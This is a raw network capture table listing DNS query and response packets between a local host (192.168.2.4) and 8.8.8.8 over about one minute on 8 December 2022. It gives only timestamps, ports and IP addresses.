Dec 8, 2022 20:22:53.893413067 CET	55570	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:53.915304899 CET	53	55570	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:53.997725964 CET	64906	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:54.017757893 CET	53	64906	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:54.221564054 CET	59446	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:54.272373915 CET	53	59446	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:54.295140028 CET	50861	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:54.312222004 CET	53	50861	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:54.491018057 CET	61088	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:54.600961924 CET	53	61088	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:54.613585949 CET	58729	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:55.618751049 CET	58729	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:55.727726936 CET	53	58729	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:55.965656042 CET	64700	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:56.073496103 CET	53	64700	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:56.082684994 CET	56022	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:56.192514896 CET	53	56022	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:56.393907070 CET	60822	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:56.425513983 CET	53	60822	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:56.440040112 CET	49750	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:56.487956047 CET	53	49750	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:56.721770048 CET	53	58729	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:56.735022068 CET	60550	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:56.843210936 CET	53	60550	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:56.856137037 CET	54851	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:56.967293024 CET	53	54851	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:57.199888945 CET	57300	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:57.246923923 CET	53	57300	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:57.357059956 CET	54521	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:57.402385950 CET	53	54521	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:57.617083073 CET	58914	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:57.638731956 CET	53	58914	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:57.826514959 CET	51419	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:57.860694885 CET	53	51419	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:58.234963894 CET	51054	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:58.254129887 CET	53	51054	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:58.567951918 CET	55673	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:58.587177038 CET	53	55673	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:58.953711033 CET	49735	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:58.999572992 CET	53	49735	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:59.014270067 CET	52437	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:59.062969923 CET	53	52437	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:59.295902967 CET	52825	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:59.313986063 CET	53	52825	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:59.459278107 CET	58530	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:59.486464977 CET	53	58530	8.8.8.8	192.168.2.4
Dec 8, 2022 20:22:59.869236946 CET	64959	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:22:59.917392969 CET	53	64959	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:00.210371971 CET	63093	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:00.258950949 CET	53	63093	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:00.631705046 CET	50433	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:00.682022095 CET	53	50433	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:00.934698105 CET	53498	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:00.953919888 CET	53	53498	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:01.398653984 CET	61460	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:01.728379011 CET	53	61460	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:02.044069052 CET	63001	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:02.373030901 CET	53	63001	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:02.839577913 CET	65133	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:02.860977888 CET	53	65133	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:04.940170050 CET	60998	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:04.957492113 CET	53	60998	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:06.391251087 CET	61733	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:06.439908028 CET	53	61733	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:06.446767092 CET	53370	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:06.632731915 CET	53	53370	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:06.821767092 CET	63746	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:06.841532946 CET	53	63746	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:06.886024952 CET	50622	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:06.904901028 CET	53	50622	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:07.306637049 CET	64773	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:07.414788961 CET	53	64773	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:07.424246073 CET	59818	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:07.532382011 CET	53	59818	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:07.732155085 CET	49684	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:07.753132105 CET	53	49684	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:07.761733055 CET	63229	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:07.784653902 CET	53	63229	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:08.023134947 CET	58576	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:08.073632956 CET	53	58576	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:08.083558083 CET	54044	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:08.112761974 CET	53	54044	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:08.441706896 CET	52259	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:08.551196098 CET	53	52259	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:08.561708927 CET	53887	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:08.667366982 CET	53	53887	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:08.894964933 CET	56218	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:09.917418003 CET	56218	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:09.936551094 CET	53	56218	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:09.941215038 CET	53	56218	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:10.157927990 CET	50094	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:10.175755978 CET	53	50094	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:10.544549942 CET	51766	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:10.653247118 CET	53	51766	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:10.664462090 CET	61522	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:10.775585890 CET	53	61522	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:11.056972980 CET	57349	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:11.168416023 CET	53	57349	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:11.181210995 CET	53963	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:11.479242086 CET	53	53963	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:11.707911968 CET	53622	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:12.035119057 CET	53	53622	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:12.046785116 CET	49600	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:12.105747938 CET	53	49600	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:12.380925894 CET	58355	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:12.402070999 CET	53	58355	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:12.588553905 CET	57601	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:12.616820097 CET	53	57601	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:13.026082993 CET	64159	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:13.072608948 CET	53	64159	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:13.088758945 CET	59926	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:13.109101057 CET	53	59926	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:13.348057032 CET	61709	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:13.399511099 CET	53	61709	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:13.445178032 CET	59182	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:13.492943048 CET	53	59182	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:13.729763031 CET	61657	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:13.751251936 CET	53	61657	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:13.762952089 CET	50012	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:13.813426018 CET	53	50012	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:14.028650045 CET	56904	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:14.137958050 CET	53	56904	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:14.148555994 CET	51511	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:14.268511057 CET	53	51511	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:14.463505983 CET	57889	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:14.593584061 CET	53	57889	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:14.602087975 CET	58480	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:14.623929024 CET	53	58480	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:14.943679094 CET	57682	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:15.052407980 CET	53	57682	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:15.064776897 CET	54075	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:15.171895981 CET	53	54075	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:15.474589109 CET	49746	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:15.582829952 CET	53	49746	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:15.591288090 CET	61940	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:15.701092005 CET	53	61940	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:16.011938095 CET	50065	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:16.033020020 CET	53	50065	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:16.141006947 CET	53573	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:16.158305883 CET	53	53573	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:16.569336891 CET	60828	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:16.679037094 CET	53	60828	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:16.687683105 CET	59673	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:16.794826031 CET	53	59673	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:17.055624962 CET	61470	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:17.165477991 CET	53	61470	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:17.176655054 CET	61837	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:17.283755064 CET	53	61837	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:17.595197916 CET	59385	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:17.647100925 CET	53	59385	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:17.656239033 CET	55704	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:17.857057095 CET	53	55704	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:18.161370993 CET	53511	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:18.272787094 CET	53	53511	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:18.280271053 CET	50532	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:18.574768066 CET	53	50532	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:18.855078936 CET	50545	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:18.904102087 CET	53	50545	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:18.928729057 CET	55285	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:18.977298021 CET	53	55285	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:19.226703882 CET	61369	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:19.275717974 CET	53	61369	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:19.284846067 CET	65419	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:19.330987930 CET	53	65419	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:19.610243082 CET	51320	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:19.657994032 CET	53	51320	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:19.665900946 CET	57214	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:19.714855909 CET	53	57214	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:19.985394001 CET	62509	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:20.007323980 CET	53	62509	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:20.084899902 CET	59892	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:20.102349997 CET	53	59892	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:20.452794075 CET	59554	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:20.501447916 CET	53	59554	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:20.509488106 CET	59877	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:20.543554068 CET	53	59877	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:20.797401905 CET	63970	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:20.829435110 CET	53	63970	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:20.916975975 CET	50660	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:20.937597990 CET	53	50660	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:21.180318117 CET	55088	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:21.291125059 CET	53	55088	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:21.301611900 CET	56804	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:21.407463074 CET	53	56804	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:22.336812973 CET	61366	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:22.358675957 CET	53	61366	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:25.348633051 CET	53539	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:25.365917921 CET	53	53539	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:26.432899952 CET	61876	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:26.588774920 CET	53	61876	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:26.598642111 CET	60046	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:26.620492935 CET	53	60046	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:26.838835955 CET	65455	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:26.859858036 CET	53	65455	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:26.979777098 CET	51140	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:26.998697996 CET	53	51140	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:27.441659927 CET	49407	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:27.490719080 CET	53	49407	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:27.553149939 CET	51466	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:27.570462942 CET	53	51466	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:27.799190998 CET	52977	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:27.908138037 CET	53	52977	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:27.916402102 CET	61610	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:28.021887064 CET	53	61610	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:28.332077026 CET	60291	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:28.438141108 CET	53	60291	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:28.447135925 CET	56637	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:28.559607983 CET	53	56637	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:28.696203947 CET	64005	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:29.003906965 CET	53	64005	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:29.012974024 CET	52496	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:29.061101913 CET	53	52496	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:29.279817104 CET	54276	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:29.322973013 CET	53	54276	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:29.334384918 CET	56923	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:29.352792025 CET	53	56923	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:29.630079031 CET	58438	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:29.676044941 CET	53	58438	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:29.795008898 CET	54945	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:29.981837988 CET	53	54945	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:30.267249107 CET	59380	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:30.587117910 CET	53	59380	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:30.604070902 CET	60602	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:30.934410095 CET	53	60602	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:31.109384060 CET	64189	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:31.230453968 CET	53	64189	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:31.239372015 CET	60088	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:31.261770010 CET	53	60088	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:31.424737930 CET	65312	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:31.444320917 CET	53	65312	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:31.622929096 CET	57549	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:31.640234947 CET	53	57549	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:32.177747965 CET	56193	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:32.225161076 CET	53	56193	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:32.233095884 CET	64617	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:32.281140089 CET	53	64617	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:32.848684072 CET	50836	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:33.177989006 CET	53	50836	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:33.187784910 CET	60649	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:33.206829071 CET	53	60649	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:33.557250023 CET	61837	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:33.727843046 CET	53	61837	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:34.126064062 CET	60752	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:34.143244028 CET	53	60752	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:34.674361944 CET	53474	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:34.783497095 CET	53	53474	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:34.794051886 CET	57019	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:34.903600931 CET	53	57019	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:35.349617004 CET	59423	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:35.372072935 CET	53	59423	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:35.381544113 CET	52733	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:35.403435946 CET	53	52733	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:35.735510111 CET	54087	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:35.845418930 CET	53	54087	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:35.885071039 CET	54479	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:35.998807907 CET	53	54479	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:36.447956085 CET	53414	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:36.494538069 CET	53	53414	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:36.520318985 CET	58274	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:36.537456036 CET	53	58274	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:36.865773916 CET	53562	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:37.174977064 CET	53	53562	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:37.182296038 CET	49665	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:37.229016066 CET	53	49665	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:37.619012117 CET	58225	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:37.640784979 CET	53	58225	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:37.651459932 CET	54725	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:37.671802998 CET	53	54725	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:37.964314938 CET	53332	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:38.012792110 CET	53	53332	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:38.063420057 CET	54726	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:38.110490084 CET	53	54726	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:38.414344072 CET	58128	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:38.433716059 CET	53	58128	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:38.443763971 CET	61579	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:38.468406916 CET	53	61579	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:38.728600025 CET	65432	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:38.838931084 CET	53	65432	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:38.849514961 CET	49735	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:38.957010031 CET	53	49735	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:39.273173094 CET	63000	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:39.295581102 CET	53	63000	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:39.621973991 CET	51418	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:39.640944958 CET	53	51418	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:40.154052973 CET	60442	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:40.174130917 CET	53	60442	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:40.189347982 CET	63302	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:40.238128901 CET	53	63302	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:40.651340008 CET	65127	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:40.672918081 CET	53	65127	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:41.060657024 CET	54852	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:41.079787016 CET	53	54852	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:41.432226896 CET	52351	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:41.542061090 CET	53	52351	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:41.837625027 CET	61946	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:42.134006023 CET	53	61946	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:42.799499035 CET	50909	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:42.831939936 CET	53	50909	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:42.842886925 CET	61648	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:42.878998995 CET	53	61648	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:46.748244047 CET	50186	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:46.794802904 CET	53	50186	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:46.805377007 CET	57776	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:46.850532055 CET	53	57776	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:47.087938070 CET	54830	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:48.123161077 CET	54830	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:48.415977955 CET	53	54830	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:48.435883045 CET	64753	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:48.542382956 CET	53	64753	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:48.771157026 CET	65099	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:49.067137957 CET	53	65099	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:49.085066080 CET	63948	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:49.194035053 CET	53	63948	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:49.400223970 CET	59605	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:49.422574997 CET	53	59605	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:49.432039976 CET	65160	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:49.454703093 CET	53	65160	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:49.736393929 CET	64430	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:49.758591890 CET	53	64430	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:49.775654078 CET	63479	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:49.807312965 CET	53	63479	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:50.128149986 CET	64209	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:50.237498999 CET	53	64209	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:50.246372938 CET	64883	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:50.351779938 CET	53	64883	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:50.630568027 CET	57430	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:50.652503967 CET	53	57430	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:50.665041924 CET	54652	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:50.684453964 CET	53	54652	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:51.085227966 CET	52435	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:51.116682053 CET	53	52435	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:51.133073092 CET	61619	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:51.153765917 CET	53	61619	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:51.416974068 CET	59198	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:51.439066887 CET	53	59198	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:51.764244080 CET	62084	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:51.791817904 CET	53	62084	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:52.168674946 CET	58041	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:52.217073917 CET	53	58041	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:52.224914074 CET	52986	53	192.168.2.4	8.8.8.8
